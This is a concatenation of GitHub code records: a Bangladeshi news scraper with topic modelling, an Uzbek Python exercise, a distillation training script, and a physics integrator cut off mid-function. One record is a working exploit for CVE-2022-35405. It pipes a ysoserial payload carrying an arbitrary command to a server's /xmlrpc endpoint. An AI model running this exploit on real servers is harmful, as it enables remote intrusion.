Trying new approach\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_jaijaidin(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//div[@class='gsc-cursor']\")\n next_page.find_element(By.XPATH, f\"//div[@aria-label='Page {i + 1}']\").click()\n\n except:\n print(\"End of Jaijaidin search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of Jaijaidin search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_inqilab(self, pages=1, keep_content=False):\n print(\"Scraping from INQILAB.\")\n self.driver.get('https://www.dailyinqilab.com/' + 'search?sq=' + 'এসিআই')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='col-xs-12 col-sm-6']\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out! News not collectable\")\n break\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='col-xs-12 col-sm-6']/a[@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_inqilab(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//ul[@class='pagination']/li/a[text()='পরে »']\")\n self.driver.get(next_page.get_attribute(\"href\"))\n except:\n print(\"End of Inqilab search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of Inqilab search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_jugantor(self, pages=1, keep_content=False):\n print(\"Scraping from Jugantor\")\n self.driver.get(\"https://www.jugantor.com/\" + \"search/google?q=\" + 'এসিআই')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n gsc_link = self.driver.find_elements(By.XPATH, \"//iframe[@name='googleSearchFrame']\")\n self.driver.get(gsc_link[0].get_attribute('src'))\n print(\"Timed out! 
Trying new approach\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_jugantor(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(3)\n\n print(\"End of Jugantor search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_nayaDiganta(self, pages=1, keep_content=False):\n print(\"Scraping from Nayadiganta\")\n self.driver.get(\"https://www.dailynayadiganta.com/\" + \"search?q=\" + 'এসিআই')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n news_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n page_link = news_link if 'ampproject' not in news_link else news_link.replace('/ampproject', '')\n\n page_dict = scan_page_nayadiganta(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of Jugantor search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_mzamin(self, pages=1, keep_content=False):\n print(\"Scraping from Manabzamin\")\n self.driver.get(\"https://mzamin.com/\")\n\n while True:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//i[@class='bi bi-search']\"))).click()\n except:\n print(\"Element not found. 
Refreshing.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//input[@class='gsc-input']\")))\n except:\n print(\"Search dialog not visible.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\")))\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\"))).send_keys(\n self.search_key + Keys.RETURN)\n break\n except:\n print(\"Can't interact with element!\")\n self.driver.refresh()\n continue\n\n print(\"Showing search results\")\n action = AC(self.driver)\n scrap_df = []\n i = 1\n while i <= pages:\n print(f\"Page {i}\")\n action.send_keys(Keys.CONTROL + Keys.HOME)\n action.pause(1)\n action.perform()\n try:\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@href][@class='gs-title']\")))\n print(\"search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@href][@class='gs-title']\")\n\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"data-ctorig\")\n page_link = \"http://www.\" + page_link[page_link.find(\"mzamin.com\"):]\n # print(page_link)\n print(j + 1, page_link)\n\n page_dict = scan_page_mzamin(page_link, keep_content=True)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n print(\"Next Page click\")\n except TimeoutException:\n print(\"Timed out!\")\n break\n except:\n print(\"End of Manabzamin search.\")\n\n i += 1\n sleep(1)\n print(\"End of Manabzamin search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_daily_star(self, pages=1, keep_content=False):\n print(\"Scraping from Daily Star\")\n self.driver.get('https://www.thedailystar.net' + '/search?t=' +\n self.search_key + '#gsc.tab=0&gsc.q=' + self.search_key + '&gsc.page=1')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_daily_star(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, 
f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of Daily Star search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_dhaka_tribune(self, pages=1, keep_content=False):\n print(\"Scraping from Dhaka Tribune\")\n self.driver.get('https://www.dhakatribune.com' + '/search?q=' + self.search_key)\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_dhaka_tribune(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of Dhaka Tribune search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_tbs(self, pages=1, keep_content=False):\n print(\"Scraping from The Business Standard\")\n self.driver.get(\"https://www.tbsnews.net/search\")\n\n while True:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//input[@class='gsc-input']\")))\n except:\n print(\"Search dialog not visible.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\")))\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\"))).send_keys(\n self.search_key + Keys.RETURN)\n break\n except:\n print(\"Can't interact with element!\")\n self.driver.refresh()\n continue\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = 
scan_page_tbs(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of The Business Standard search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_fin_exp(self, pages=1, keep_content=False):\n print(\"Scraping from The Financial Express\")\n self.driver.get(\"https://thefinancialexpress.com.bd/\" + \"search?term=news&query=\" + self.search_key + \"&page=1\")\n\n while True:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//input[@class='gsc-input']\")))\n except:\n print(\"Search dialog not visible.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\")))\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\"))).send_keys(\n self.search_key + Keys.RETURN)\n break\n except:\n print(\"Can't interact with element!\")\n self.driver.refresh()\n continue\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_tbs(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of The Business Standard search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n\nclass TopicModel():\n stop_words = stopwords.words('english')\n stop_words.extend(\n ['from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know', 'good', 'go', 'get',\n 'do', 'done', 'try', 'many', 'some', 
'nice', 'thank', 'think', 'see', 'rather', 'easy', 'easily', 'lot',\n 'lack', 'make', 'want', 'seem', 'run', 'need', 'even', 'right', 'line', 'even', 'also', 'may', 'take', 'come',\n 'aci'])\n\n\n def sentence_to_words(self,sentences):\n for sent in sentences:\n sent = re.sub(r'\\S*@\\S*\\s?', '', sent) # remove emails\n sent = re.sub(r'\\s+', ' ', sent) # remove newline chars\n sent = re.sub(\"\\'\", \"\", sent) # remove single quotes\n sent = gensim.utils.simple_preprocess(str(sent), deacc=True)\n yield (sent)\n\n def process_words(self, texts, stop_words=stop_words, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']):\n data_words = self.sentence_to_words(texts)\n bigram = gensim.models.Phrases(data_words, min_count=5, threshold=100) # higher threshold fewer phrases.\n trigram = gensim.models.Phrases(bigram[data_words], threshold=100)\n bigram_mod = gensim.models.phrases.Phraser(bigram)\n trigram_mod = gensim.models.phrases.Phraser(trigram)\n\n texts = [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts]\n texts = [bigram_mod[doc] for doc in texts]\n texts = [trigram_mod[bigram_mod[doc]] for doc in texts]\n # texts_out = []\n # nlp = spacy.load('en', disable=['parser', 'ner'])\n # for sent in texts:\n # doc = nlp(\" \".join(sent))\n # texts_out.append([token.lemma_ for token in doc if token.pos_ in allowed_postags])\n # remove stopwords once more after lemmatization\n\n # texts_out = [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts_out]\n return texts\n\n def make_topic_model(self,data_ready):\n id2word = corpora.Dictionary(data_ready)\n corpus = [id2word.doc2bow(text) for text in data_ready]\n\n # Build LDA model\n lda_model = gensim.models.ldamodel.LdaModel(corpus=corpus,\n id2word=id2word,\n num_topics=4,\n random_state=100,\n update_every=1,\n chunksize=10,\n passes=10,\n alpha='symmetric',\n iterations=100,\n per_word_topics=True)\n\n # pprint(lda_model.print_topics())\n vis = pyLDAvis.gensim_models.prepare(lda_model, corpus, dictionary=lda_model.id2word)\n\n return lda_model, vis","repo_name":"Minhaz034/BD-newspaper-scrapper","sub_path":"scraputil.py","file_name":"scraputil.py","file_ext":"py","file_size_in_byte":61053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22742437185","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 13 15:52:34 2023\n\n@author: pc\n\"\"\"\n# Ask the user to enter an even number. If the user enters an even number,\n# print \"Rahmat!\" (\"Thanks!\"); if they enter an odd number, print \"Bu son juft emas\" (\"This number is not even\").\n\nson = float(input(\"Juft son kiriting. \\n> \"))\nif son%2:\n print(\"Bu juft son emas.\")\nelse:\n print(\"Rahmat.\")\n \n# Ask the user's age, and print the price of a museum admission ticket:\n#yosh = int(input(\"Iltimos, yoshingizni kiriting. \\n> \"))\n#if yosh <= 4 or yosh >= 60:\n# print(\"Sizga muzeyga kirish bepul. Marhamat!\")\n#elif yosh <= 18:\n# print(\"Muzeyga kirish bileti narxi 10000 so'm\")\n#else:\n# print(\"Muzeyga kirish bileti narxi 20000 so'm\")\n \n# or:\n#yosh = int(input(\"Yoshingiz nechida?\"))\n\n#if yosh<=4 or yosh>=60:\n# narh = 0;\n#elif yosh < 18:\n# narh = 10000\n#else:\n# narh = 20000\n#print(f\"Chipta {narh} so'm\") \n \n# Ask the user to enter two numbers, compare them, and print a message about\n# whether they are equal or which one is greater/smaller:\n \n#son_1 = float(input(\"Istalgan sonni kiriting. 
\\n> \"))\n#son_2 = float(input(\"Istalgan yana bir sonni kiriting. \\n> \"))\n#if son_1 > son_2:\n# print(f\"{son_1} > {son_2}\")\n#elif son_1 < son_2:\n# print(f\"{son_1} < {son_2}\")\n#else:\n# print(f\"{son_1} = {son_2}\")\n \n# \n#mahsulotlar = [\"kartoshka\", \"piyoz\", \"sabzi\", \"anor\", \"anjir\", \"o'rik\", \"uzum\",\n # \"shaftoli\", \"tarvuz\", \"qovun\"]\n#savat = []\n#for meva in range(5):\n# savat.append(input(f\"Savatga {meva+1}-mahsulotni kiriting. \\n> \"))\n#for meva in savat:\n# if meva in mahsulotlar:\n# print(f\"Do'konimizda {meva} bor\")\n# else:\n# print(f\"Do'konimizda {meva} yo'q\")\n\n#iphone = [\"Iphone XS\", \"Iphone X\", \"Iphone 12\", \"Iphone 12 Pro\", \"Iphone 13 Pro Max,\",\n# \"Iphone 7\", \"Iphone 8\", \"Iphone 14 Pro Max\"]\n#order = []\n#for model in range(6):\n# order.append(input(f\"Harid qilmoqchi bo'lgan {model+1}-telefon modelini kiriting.\\n> \"))\n#for model in order:\n# if model in iphone:\n# print(f\"Bizda {model} modeli mavjud.\")\n# else:\n# print(f\"Bizda {model} modeli mavjud emas.\")\n \n# foydalanuvchilar degan ro'yxat tuzing, va kamida 5 ta login qo'shing. \n#Foydalanuvchidan yangi login tanlashni so'rang va foydalanuvchi kiritgan loginni\n# foydalanuvchilar degan ro'yxatning tarkibi bilan solishtiring. Agar ro'yxatda \n#bunday login mavjud bo'lsa, \"Login band, yangi login tanlang!\" aks holda \n#\"Xush kelibsiz, foydalanuvchi!\" xabarini chiqaring.\n\nfoydalanuvchilar = [\"omadbek\",\"alisher\", \"elmurod\",\"laziz\",\"qudrat\",\"nuriddin\"]\nyangi_foydalanuvchi = []\nyangi_foydalanuvchi.append(input(\"Iltimos yangi login kiriting. \\n> \"))\nfor new in yangi_foydalanuvchi:\n if new in foydalanuvchilar:\n print(\"Kechirasiz, login band. Yangi login tanlang.\")\n else:\n print(\"Hush kelibsiz!\")\n\n# Boshqa bir usul:\n\nusers = [\"omadbek\", \"javlon\", \"alisher\", \"bunyod\"]\nlogin = input(\"Iltimos, yangi login tanlang. \\n> \")\nif login in users:\n print(\"Login band. 
Iltimos boshqa login tanlang.\")\nelse:\n print(\"Hush kelibsiz!\")\n\n\n\n\n\n\n#mahsulotlar = [\"kartoshka\", \"piyoz\", \"sabzi\", \"anor\", \"anjir\", \"o'rik\", \"uzum\",\n# \"shaftoli\", \"tarvuz\", \"qovun\"]\n#buyurtma = []\n#for meva in range(5):\n#if buyurtma:\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"Omadbekdev/pyhton-lessons","sub_path":"lesson-9_(mashqlar)_bir_necha_shartlarni_tek_(9).py","file_name":"lesson-9_(mashqlar)_bir_necha_shartlarni_tek_(9).py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39867525943","text":"import requests\nimport os\nimport argparse\n\nprint('CVE-2022-33405 - Engines RCE exploit :)')\nparser = argparse.ArgumentParser(description='')\nparser.add_argument('-u', '--url', help='URL of the server', required=True)\nparser.add_argument('-p', '--port', help='Port of the server', required=True)\nparser.add_argument('-j', '--jar', help='Path to the YSoserial jar', required=True)\nparser.add_argument('-c', '--command', help='Command to execute on server', required=True)\n\nargs = parser.parse_args()\nurl = args.url\nif url[-1:] == '/':\n url = url[:-1]\nport = args.port\njar = args.jar\ncommand_payload = args.command\n\nrequests.packages.urllib3.disable_warnings()\n\ndef ysoserial(command_payload, jar):\n o = os.popen(f'java -jar {jar} CommonsBeanutils1 \"{command_payload}\" | base64 | tr -d \"\\\\n\"').read()\n print(f'[+] Payload: {o}')\n return o\n \ndef make_request(url, port, ysoserial_payload):\n url = f\"{url}:{port}/xmlrpc\"\n headers = {\"Connection\": \"close\", \"Content-Type\": \"application/xml\"}\n data = f'big0ustest{ysoserial_payload}'\n r = requests.post(url, headers=headers, data=data, verify=False)\n if 'java.lang.reflect.InvocationTargetException' in r.text:\n print(f'[+] Successfully executed command')\n else:\n print(f'[-] Failed to execute command')\n print(f'[-] Response: {r.text}')\n\nprint(f'[+] Command: {command_payload}')\nysoserial_payload = ysoserial(command_payload, jar)\nmake_request(url, port, ysoserial_payload)\n","repo_name":"viniciuspereiras/CVE-2022-35405","sub_path":"CVE-2022-35405.py","file_name":"CVE-2022-35405.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"42588068136","text":"from typing import Any\nfrom pytorch_lightning.utilities.types import EVAL_DATALOADERS\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nimport pytorch_lightning as pl\nimport torchmetrics\nfrom lightning.pytorch.accelerators import find_usable_cuda_devices\nfrom torch.optim.lr_scheduler import StepLR\n\nbatch_size = 2\n\nclass TeacherNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 10)\n \n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = torch.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass StudentNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 10)\n \n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = torch.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass KnowledgeDistillation(pl.LightningModule):\n def __init__(self, teacher, student, T=20, alpha=0.5):\n super().__init__()\n self.teacher = teacher\n 
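# Note: only the student is optimized; configure_optimizers() below passes
# just the student's parameters to Adam, so the teacher stays fixed and is
# used purely to produce the soft targets for distillation.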
self.student = student\n self.T = T\n self.alpha = alpha\n self.ce_loss = nn.CrossEntropyLoss()\n \n def forward(self, x):\n return self.student(x)\n \n def training_step(self, batch, batch_idx):\n x, y = batch\n teacher_outputs = self.teacher(x) / self.T\n student_outputs = self.student(x) / self.T\n \n ce_loss = self.ce_loss(student_outputs, y)\n kd_loss = nn.KLDivLoss()(torch.log_softmax(student_outputs, dim=1), torch.softmax(teacher_outputs, dim=1))\n loss = (1 - self.alpha) * ce_loss + self.alpha * self.T * self.T * kd_loss\n \n self.log(\"train_loss\", loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x, y = batch\n y_hat = self.student(x)\n acc = torchmetrics.functional.accuracy(y_hat, y)\n self.log(\"val_acc\", acc)\n return acc\n \n def configure_optimizers(self):\n optimizer = optim.Adam(self.student.parameters(), lr=1e-3)\n #scheduler = StepLR(optimizer, step_size=1000, gamma=0.1)\n return optimizer\n \n def train_dataloader(self):\n train_dataset = torchvision.datasets.MNIST(root='./data', \n train=True, \n transform=transforms.ToTensor(), \n download=True)\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n batch_size=batch_size, \n shuffle=True,\n num_workers=4)\n return train_loader\n \n def val_dataloader(self):\n val_dataset = torchvision.datasets.MNIST(root='./data', \n train=False, \n transform=transforms.ToTensor(), \n download=True)\n val_loader = torch.utils.data.DataLoader(dataset=val_dataset, \n batch_size=batch_size, \n shuffle=False,\n num_workers=4)\n return val_loader\n\n\n\n#check gpu\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#setup\ntorch.set_float32_matmul_precision('high')\n\n# initialize models\nteacher = TeacherNet()\nstudent = StudentNet()\n\n# initialize trainer\ntrainer = pl.Trainer(max_epochs=5, accelerator=\"cpu\", devices='auto')\n\n# initialize knowledge distillation module\nkd_module = KnowledgeDistillation(teacher, student)\n\n# train the student network using knowledge distillation\ntrainer.fit(kd_module)\n\n\n","repo_name":"KhanhNguyen4999/Speech-Enhancement-CLSKD","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5135518319","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 24 18:56:02 2018\n\n@author: michael\n\"\"\"\n\nimport global_var as var\nimport numpy as np\nfrom os import listdir\n\ndef list_files(directory, extension):\n return (f for f in listdir(directory) if f.endswith('.' + extension))\n\ndef find_nearest(array, value):\n idx = (np.abs(array - value)).argmin()\n return idx\n\ndef B_field(R):\n \"\"\" Returns B_field at location R as described by an idealized magnetic dipole.\"\"\"\n R_o = np.array([0, 0, -.01])\n r = np.subtract(R, R_o)\n r_norm = np.linalg.norm(r)\n B_1 = (3*np.dot(var.mag,r)*r)/(r_norm**5)\n B_2 = var.mag/(r_norm**3)\n B = np.subtract(B_1, B_2)*10**-7\n \n return B\n\ndef mult_Q(P, R, coeff=False):\n \"\"\" Performs quaternionic multiplication between P and R. 
\"\"\"\n \n if coeff == False:\n coeff = 1.0\n \n u0 = coeff*(P[0]*R[0] - np.dot(P[1:4],R[1:4]))\n u = coeff*np.add(np.add(P[0]*R[1:4],R[0]*P[1:4]),np.cross(P[1:4],R[1:4]))\n \n Q = np.array([u0, u[0], u[1], u[2]])\n return Q\n \ndef conj_Q(Q):\n \"\"\" Returns the complex conjugate of Q.\"\"\"\n Q_new = np.array([Q[0], -Q[1], -Q[2], -Q[3]])\n return Q_new \n\ndef integrate_flight(t, InCon, Prams):\n \"\"\" Track grain through phase space during flight.\n\n Parameters\n ----------\n InCon : array\n phase space of grain\n -position : {0:3} \n -velocity : {3:6}\n -quaternion : {6:10}\n -quaternion derivative : {10:14}\n \n Prams : dict\n system parameters\n 'length' : length of grain\n 'mass' : mass of grain \n 'charge' : charge on grain\n 'magnetic' : magnetic moment of grain\n 'momentx' : moment of inertia in X\n 'momentz' : moment of inertia in Z\n \"\"\"\n r = InCon[0:3]\n v = InCon[3:6]\n quat = InCon[6:10]\n quat_norm = np.linalg.norm(quat)\n if (quat_norm > 1.00001) or (quat_norm < 0.99999):\n quat = quat/quat_norm \n quat_deriv = InCon[10:14]\n \n 